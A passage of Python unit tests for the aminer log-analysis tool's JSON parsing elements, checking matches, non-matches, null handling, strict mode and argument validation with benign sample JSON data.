[DummyFixedDataModelElement("a", b"a")]} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": ["a"]}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # test functionality with json dicts key_parser_dict = {"+a": {"b": DummyFixedDataModelElement("b", b"b")}} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": {"b": "b"}}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # no match with null in object key_parser_dict = {"+a": {"b": DummyFixedDataModelElement("b", b"null")}} json_model_element = JsonModelElement(self.id_, key_parser_dict) match_context = DummyMatchContext(data_object_null) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data_object_null, match_element, match_context) # test interchangeability with optional_key_prefix key_parser_dict = {"+optional_key_a": DummyFixedDataModelElement("a", b"a")} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": "a"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_empty) match_context = DummyMatchContext(data_empty) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_empty, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) key_parser_dict = {"optional_key_+a": DummyFixedDataModelElement("a", b"a")} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": "a"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_empty) match_context = DummyMatchContext(data_empty) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_empty, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test5get_match_element_null_value(self): """Test if null keys and values can be used.""" key_parser_dict = { "works": DummyFirstMatchModelElement("id", [ DummyFixedDataModelElement("abc", b"abc"), DummyFixedDataModelElement("123", b"123")]), "null": "NULL_OBJECT" } data1 = b"""{ "works": "123", "null": null }""" data2 = b"""{"a": {"b": "c"}}""" data3 = b"""{"a": null}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) data = data1 value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) key_parser_dict = {"a": {"b": DummyFixedDataModelElement("c", b"c")}} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = data2 value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = data3 match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test6get_match_element_with_umlaut(self): """Test if ä ö ü are used correctly.""" key_parser_dict = {"works": DummyFixedDataModelElement("abc", "a ä ü ö z".encode("utf-8"))} data = """{ "works": "a ä ü ö z" }""".encode("utf-8") json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test7get_match_element_same_value_as_key(self): """Test if object with the same key-value pairs are parsed correctly.""" key_parser_dict = {"abc": DummyFirstMatchModelElement("first", [ DummyFixedDataModelElement("abc", b"abc"), DummyFixedDataModelElement("abc", b"ab"), DummyFixedDataModelElement("abc", b"bc"), DummyFixedDataModelElement("abc", b"ba"), DummyFixedDataModelElement("abc", b"b"), DummyFixedDataModelElement("abc", b"d")])} data = b"""{"abc":"abc"}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b"""{"abc":"ab"}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b"""{"abc":"bc"}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b"""{"abc":"b"}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b"""{"abc":"d"}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b"""{"abc":"ba"}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test8get_match_element_empty_array_empty_object_null(self): """Test if the keywords EMPTY_ARRAY, EMPTY_OBJECT, EMPTY_STRING, and None NULL_OBJECT work properly.""" key_parser_dict = {"menu": { "id": "EMPTY_OBJECT", "value": "EMPTY_ARRAY", "popup": { "menuitem": [{ "value": "NULL_OBJECT", "onclick": DummyFirstMatchModelElement("buttonOnclick", [ DummyFixedDataModelElement("create_new_doc", b"CreateNewDoc()"), DummyFixedDataModelElement("open_doc", b"OpenDoc()"), DummyFixedDataModelElement("close_doc", b"CloseDoc()")]), "optional_key_clickable": DummyFirstMatchModelElement("clickable", [ DummyFixedDataModelElement("true", b"true"), DummyFixedDataModelElement("false", b"false")]) }] }}, "a": "EMPTY_ARRAY", "b": "EMPTY_OBJECT", "c": "EMPTY_STRING" } json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"menu": {"id": {}, "value": [], "popup": {"menuitem": [{"value": null, "onclick": "CreateNewDoc()"}, {"value": null, ' \ b'"onclick": "OpenDoc()"}, {"value": null, "onclick": "CloseDoc()"}]}}, "a": [], "b": {}, "c": ""}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b'{"menu": {"id": {\n}, "value": [\n], "popup": {"menuitem": [{"value": null, "onclick": "CreateNewDoc()"}, {"value": ' \ b'null, "onclick": "OpenDoc()"}, {"value": null, "onclick": "CloseDoc()"}]}}, "a": [], "b": {}, "c": ""}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b'{"menu": {"id": {}, "value": [], "popup": {"menuitem": []}}, "a": [], "b": {}, "c": ""}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) JsonModelElement(self.id_, {"a": "EMPTY_ARRAY"}) JsonModelElement(self.id_, {"a": "EMPTY_OBJECT"}) JsonModelElement(self.id_, {"a": "EMPTY_STRING"}) data = b'{"menu": {"id": {}, "value": [], "popup": {"menuitem": [{"value": null, "onclick": "CreateNewDoc()"}, {"value": null, ' \ b'"onclick": "OpenDoc()"}, {"value": null, "onclick": "CloseDoc()"}]}}, "a": ["a"], "b": {}, "c": ""}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b'{"menu": {"id": {}, "value": [], "popup": {"menuitem": [{"value": null, "onclick": "CreateNewDoc()"}, {"value": null, ' \ b'"onclick": "OpenDoc()"}, {"value": null, "onclick": "CloseDoc()"}]}}, "a": [], "b": {"a": "a"}, "c": ""}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b'{"menu": {"id": {}, "value": [], "popup": {"menuitem": [{"value": null, "onclick": "CreateNewDoc()"}, {"value": null, ' \ b'"onclick": "OpenDoc()"}, {"value": null, "onclick": "CloseDoc()"}]}}, "a": [], "b": {}, "c": "ab"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) key_parser_dict = {"ALLOW_ALL_KEYS": DummyFirstMatchModelElement("first", [ DummyFixedDataModelElement("abc", b"abc"), DummyFixedDataModelElement("123", b"123")])} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"key1": "abc", "afd": "abc", "1234": "123", "&544": "123"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test9get_match_element_float_exponents(self): """ Parse float values with exponents. The principle of only testing dummy classes can not be applied here, as the functionality between the JsonModelElement and DecimalFloatValueModelElement must be tested directly. """ json_model_element = JsonModelElement(self.id_, { "a": DecimalFloatValueModelElement(self.id_, exponent_type=DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL), "b": DecimalFloatValueModelElement(self.id_, exponent_type=DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL)}) def format_float(val): """ This function formats the float-value and parses the sign and the exponent """ exp = None if "e" in val: exp = "e" elif "E" in val: exp = "E" if "+" in val: sign = "+" else: sign = "-" if exp is not None: pos_point = val.find(exp) if "." in val: pos_point = val.find(".") if len(val) - val.find(sign) <= 2: result = format(float(val), "1.%dE" % (val.find(exp) - pos_point))[:-2] result += format(float(val), "1.%dE" % (val.find(exp) - pos_point))[-1] return result return format(float(val), "1.%dE" % (val.find(exp) - pos_point)) return float(val) data = b'{"a": 111.1, "b": 111.1}' value = json.loads(data, parse_float=format_float) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b'{"a": 1E-01, "b": 111.1}' value = json.loads(data, parse_float=format_float) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b'{"a": 111.1, "b": 1E-1}' value = json.loads(data, parse_float=format_float) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b'{"a": 1E-1, "b": 1E-1}' value = json.loads(data, parse_float=format_float) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test10get_match_element_allow_all_fields(self): """Parse matching substring from MatchContext using the allow_all_fields parameter.""" json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all_fields, allow_all_fields=True) data = self.single_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all_fields, allow_all_fields=False) data = self.single_line_json match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test11get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" json_model_element = JsonModelElement(self.id_, self.key_parser_dict) # missing key data = self.single_line_missing_key_json match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # object instead of array data = self.single_line_object_instead_of_array match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # invalid json data = self.single_line_invalid_json match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # child not matching data = self.single_line_no_match_json match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # all keys missing data = b"{}" match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) json_model_element = JsonModelElement(self.id_, self.empty_key_parser_dict) data = b"[]" match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"{[]}" match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b'{"key": []}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) key_parser_dict = {"a": [{"b": DummyFixedDataModelElement("b", b"ef")}]} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": [{"b": "fe"}]}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) key_parser_dict = {"a": [DummyFixedDataModelElement("a", b"gh")]} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": ["hg"]}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) key_parser_dict = {"a": {"b": DummyFixedDataModelElement("c", b"c")}} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": "b"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test12element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, JsonModelElement, "", self.key_parser_dict) # empty element_id self.assertRaises(TypeError, JsonModelElement, None, self.key_parser_dict) # None element_id self.assertRaises(TypeError, JsonModelElement, b"path", self.key_parser_dict) # bytes element_id is not allowed self.assertRaises(TypeError, JsonModelElement, True, self.key_parser_dict) # boolean element_id is not allowed self.assertRaises(TypeError, JsonModelElement, 123, self.key_parser_dict) # integer element_id is not allowed self.assertRaises(TypeError, JsonModelElement, 123.22, self.key_parser_dict) # float element_id is not allowed self.assertRaises(TypeError, JsonModelElement, {"id": "path"}, self.key_parser_dict) # dict element_id is not allowed self.assertRaises(TypeError, JsonModelElement, ["path"], self.key_parser_dict) # list element_id is not allowed self.assertRaises(TypeError, JsonModelElement, [], self.key_parser_dict) # empty list element_id is not allowed self.assertRaises(TypeError, JsonModelElement, (), self.key_parser_dict) # empty tuple element_id is not allowed self.assertRaises(TypeError, JsonModelElement, set(), self.key_parser_dict) # empty set element_id is not allowed def test13key_parser_dict_input_validation(self): """Check if key_parser_dict is validated.""" self.assertRaises(TypeError, JsonModelElement, self.id_, "path") # string key_parser_dict self.assertRaises(TypeError, JsonModelElement, self.id_, None) # None key_parser_dict self.assertRaises(TypeError, JsonModelElement, self.id_, b"path") # bytes key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, True) # boolean key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, 123) # integer key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, 123.22) # float key_parser_dict is not allowed # dict key_parser_dict with no ModelElementInterface values is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, {"id": "path"}) # dict key_parser_dict with list of other lengths than 1 is not allowed. key_parser_dict = copy.deepcopy(self.key_parser_dict) key_parser_dict["menu"]["popup"]["menuitem"] = [] self.assertRaises(ValueError, JsonModelElement, self.id_, key_parser_dict) self.assertRaises(TypeError, JsonModelElement, self.id_, ["path"]) # list key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, []) # empty list key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, ()) # empty tuple key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, set()) # empty set key_parser_dict is not allowed def test14optional_key_prefix_input_validation(self): """Check if optional_key_prefix is validated.""" self.assertRaises(ValueError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix="") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=None) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=b"path") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=True) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=123) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=123.22) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix={"id": "path"}) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=["path"]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=[]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=()) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=set()) def test15nullable_key_prefix_input_validation(self): """Check if optional_key_prefix is validated.""" self.assertRaises(ValueError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix="") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=None) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=b"path") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=True) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=123) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=123.22) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix={"id": "path"}) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=["path"]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=[]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=()) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=set()) def test16allow_all_fields_input_validation(self): """Check if allow_all_fields is validated.""" self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields="") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=None) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=b"path") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=123) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=123.22) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields={"id": "path"}) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=["path"]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=[]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=()) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=set()) def test17get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = JsonModelElement(self.id_, self.key_parser_dict) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test18same_optional_key_and_nullable_key_prefix(self): """Test if an exception is thrown if the optional_key_prefix is the same as the nullable_key_prefix.""" self.assertRaises(ValueError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix="+", nullable_key_prefix="+") if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/JsonStringModelElementTest.py000066400000000000000000000235461500476301700312420ustar00rootroot00000000000000import copy import unittest import json from aminer.parsing.JsonStringModelElement import JsonStringModelElement, JsonAccessObject from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyFirstMatchModelElement class JsonStringModelElementTest(TestBase): """Unittests for the JsonStringModelElement.""" id_ = "json" path = "path" strict = False ignore_null = True def test1get_id(self): """Test if get_id works properly.""" host = DummyFixedDataModelElement("host", b"www.google.com") user = DummyFixedDataModelElement("user", b"foobar") key_parser_dict = { "host": host, "user": user } json_me = JsonStringModelElement(self.id_, key_parser_dict, self.strict, self.ignore_null) self.assertEqual(json_me.get_id(), self.id_) def test2get_match_element_valid_match(self): """Parses a json-file and compares if the configured ModelElements are parsed properly.""" host = DummyFixedDataModelElement("host", b"www.google.com") user = DummyFixedDataModelElement("user", b"foobar") key_parser_dict = { "host": host, "user": user } json_model_element = JsonStringModelElement(self.id_, key_parser_dict, self.strict, self.ignore_null) data = b'{"host": "www.google.com", "user": "foobar", "one": "two"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.assertEqual(2, len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) self.assertEqual(b"foobar", match_element.children[1].get_match_object()) def test3strict_mode(self): """Parses a json-file and compares if the configured ModelElements are parsed properly with strict_mode.""" host = DummyFixedDataModelElement("host", b"www.google.com") user = DummyFixedDataModelElement("user", b"foobar") path = DummyFixedDataModelElement("path", b"/index.html") key_parser_dict = { "host": { "server": host }, "user": user } # Sets strict_mode to True json_model_element = JsonStringModelElement(self.id_, key_parser_dict, True, self.ignore_null) # "one": "two" is too much data = b'{"host": {"server": "www.google.com"}, "user": "foobar", "one": "two"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.assertEqual(None,match_element) # Sets one more element key_parser_dict = { "host": { "server": host }, "user": user, "path": path } # Sets strict_mode to True json_model_element = JsonStringModelElement(self.id_, key_parser_dict, True) # "one": "two" is too much data = b'{"host": {"server": "www.google.com"}, "user": "foobar", "one": "two"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.assertEqual(None,match_element) # Sets the logdata to the exact configuration-json. data = b'{"host": {"server": "www.google.com"}, "user": "foobar", "path": "/index.html"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.assertEqual(3,len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) self.assertEqual(b"foobar", match_element.children[1].get_match_object()) self.assertEqual(b"/index.html", match_element.children[2].get_match_object()) def test4ignore_null(self): """Parses a json-file with ignore_null and compares if the configured ModelElements are parsed properly.""" host = DummyFixedDataModelElement("host", b"www.google.com") user = DummyFixedDataModelElement("user", b"foobar") key_parser_dict = { "host": host, "user": user } # Set ignore_null to True and strict to False json_model_element = JsonStringModelElement(self.id_, key_parser_dict, False, True) # Set user to null data = b'{"host": "www.google.com", "user": null, "one": "two"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # Line must be parsed but without "user": self.assertEqual(1, len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) # set ignore_null to False and strict to False json_model_element = JsonStringModelElement(self.id_, key_parser_dict, False, False) # Set user to null data = b'{"host": "www.google.com", "user": null, "one": "two"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # expect an unparsed line self.assertEqual(None,match_element) # set example user to empty string user = DummyFixedDataModelElement("user", b"") key_parser_dict2 = { "host": host, "user": user } # Set ignore_null to False in order to pass b"" to the subparser. Strict is False json_model_element = JsonStringModelElement(self.id_, key_parser_dict2, False, False) # Set user to null data = b'{"host": "www.google.com", "user": null}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # Line must be parsed: self.assertEqual(2, len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) self.assertEqual(b"", match_element.children[1].get_match_object()) # Set ignore_null to True and strict to True json_model_element = JsonStringModelElement(self.id_, key_parser_dict, True, True) # Set user to null data = b'{"host": "www.google.com", "user": null}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # Line must be parsed but without "user": self.assertEqual(1, len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) # set ignore_null to False and strict to True json_model_element = JsonStringModelElement(self.id_, key_parser_dict, True, False) # Set user to null data = b'{"host": "www.google.com", "user": null}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # expect an unparsed line self.assertEqual(None,match_element) # set example user to empty string user = DummyFixedDataModelElement("user", b"") key_parser_dict2 = { "host": host, "user": user } # Set ignore_null to False in order to pass b"" to the subparser. Strict is True json_model_element = JsonStringModelElement(self.id_, key_parser_dict2, True, False) # Set user to null data = b'{"host": "www.google.com", "user": null}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # Line must be parsed: self.assertEqual(2, len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) self.assertEqual(b"", match_element.children[1].get_match_object()) class JsonAccessObjectTest(TestBase): def test1get_id(self): """Parses a dictionary and see if everything is flattened properly.""" d = {'a': 'b', 'c': {'w': 'g', 'rata': 'mahatta', 'tic': {'tac': 'toe'}, 'brat': ['worst','wuast',{'key': ['wurst','fleisch'], 'food': 'veggie'},'blues'],'bist': 'narrisch'}, 'foo': 'bar'} """ a: b c.w: g c.rata: mahatta c.tic.tac: toe c.brat[0]: worst c.brat[1]: wuast c.brat[2].key[0]: wurst c.brat[2].key[1]: fleisch c.brat[2].food: veggie c.brat[3]: blues foo: bar """ jao = JsonAccessObject(d) self.assertTrue(jao.collection['a']) 